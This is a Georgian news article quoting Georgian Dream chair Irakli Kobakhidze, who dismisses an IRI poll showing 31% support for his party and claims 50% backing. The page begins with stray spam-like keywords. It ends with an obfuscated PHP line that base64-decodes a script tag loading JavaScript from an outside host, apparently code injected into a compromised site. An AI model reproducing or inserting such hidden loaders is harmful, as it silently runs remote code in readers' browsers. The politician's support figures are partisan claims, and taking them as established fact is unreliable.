celsiusi
ავერსი საქკაბელი
ჩვენ გვაქვს გარკვეული კითხვები იმ კომპანიასთან მიმართებით, რომელიც IRI-ს კვლევას უტარებს, თუმცა ვხედავთ, რომ ამ კომპანიის მიერ ჩატარებული კვლევაც კი არის უმძიმესი ოპოზიციისთვის და მათი კომენტარებიდან ეს მკაფიოდ ჩანს, - ამის შესახებ „ქართული ოცნების“ თავმჯდომარემ, ირაკლი კობახიძემ პარტიის ოფისში გამართულ ბრიფინგზე განაცხადა, რითაც გამოეხმაურა ჟურნალისტის მიერ დასმულ შეკითხვას იმის შესახებ, ენდობა თუ არა ის IRI-ის მიერ ჩატარებულ კვლევას, რომლის მიხედვითაც გამოკითხულთა 31% „ქართულ ოცნებას“ მისცემდა ხმას.
 
კობახიძის თქმით, ამ მიმართულებით ანალიზის გაკეთებისას მმართველი პარტია თავის მონაცემებს ეყრდნობა.
 
„ოპოზიცია ყველა მიმართულებით რომ არის უმძიმეს მდგომარეობაში, ამას ყველა ხედავს. საქართველოში ჩვენი მხარდამჭერია მოსახლეობის 50%. ჩვენ ვამბობთ, რომ დაუშვებელია ოპოზიცია ამ ფორმით დარჩეს საქართველოში. ვიდრე ოპოზიცია ამ აბსოლუტურად დეგრადირებული სახეებით რჩება პოლიტიკაში, მანამდე პოლიტიკურ სისტემას სათანადო განვითარება არ უწერია. „ქართულ ოცნებაში“ აბსოლუტურად განსხვავებული მოცემულობაა - შეგიძლიათ შეადაროთ ერთმანეთს ჩვენი სახეები და გუბაზ სანიკიძე, სალომე სამადაშვილი“, - განაცხადა ირაკლი კობახიძემ.
604
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");